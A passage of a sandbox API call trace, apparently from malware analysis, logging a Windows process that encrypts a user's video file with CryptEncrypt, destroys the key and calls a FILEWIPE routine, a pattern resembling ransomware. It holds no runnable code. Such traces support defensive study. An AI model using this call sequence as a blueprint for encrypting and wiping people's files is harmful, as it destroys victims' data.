returned 0 [0042.755] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.755] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.755] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.755] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.755] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.755] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.755] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.755] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.755] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.755] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.755] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.756] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.756] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.756] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.757] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x8f41, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x8f50) returned 1 [0042.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.757] CharLowerBuffW (in: lpsz="byte[36689]", cchLength=0xb | out: lpsz="byte[36689]") returned 0xb [0042.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.759] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.760] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x935008*, pdwDataLen=0x6ae220*=0x8f41, dwBufLen=0x8f50 | out: pbData=0x935008*, pdwDataLen=0x6ae220*=0x8f50) returned 1 [0042.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.764] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.764] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.764] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.764] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.764] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.764] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.764] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.764] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.764] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.764] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.764] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.764] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.767] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.767] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.768] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.770] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.770] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.770] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.770] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.770] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0042.770] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.770] CryptDestroyKey (hKey=0x7c2280) returned 1 [0042.771] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.771] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.771] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.771] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.771] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.771] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.771] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.771] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0042.771] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.771] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.771] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.771] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.772] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.772] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.772] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.772] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.772] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.772] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0042.772] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.772] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0042.772] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.772] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0042.772] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.772] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0042.773] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.773] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.773] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.773] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0042.773] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.773] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.773] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.773] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.773] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.774] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.774] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0042.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.774] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.774] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.774] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55664c50, ftCreationTime.dwHighDateTime=0x1d5bf89, ftLastAccessTime.dwLowDateTime=0x88d86be0, ftLastAccessTime.dwHighDateTime=0x1d5bf3e, ftLastWriteTime.dwLowDateTime=0x88d86be0, ftLastWriteTime.dwHighDateTime=0x1d5bf3e, nFileSizeHigh=0x0, nFileSizeLow=0x8f41, dwReserved0=0x0, dwReserved1=0x777648, cFileName="urM8i1sK.swf", cAlternateFileName="")) returned 0x7c2100 [0042.774] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.775] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.775] CharLowerBuffW (in: lpsz="byte[36673]", cchLength=0xb | out: lpsz="byte[36673]") returned 0xb [0042.775] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.775] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.775] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.775] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.775] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.775] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 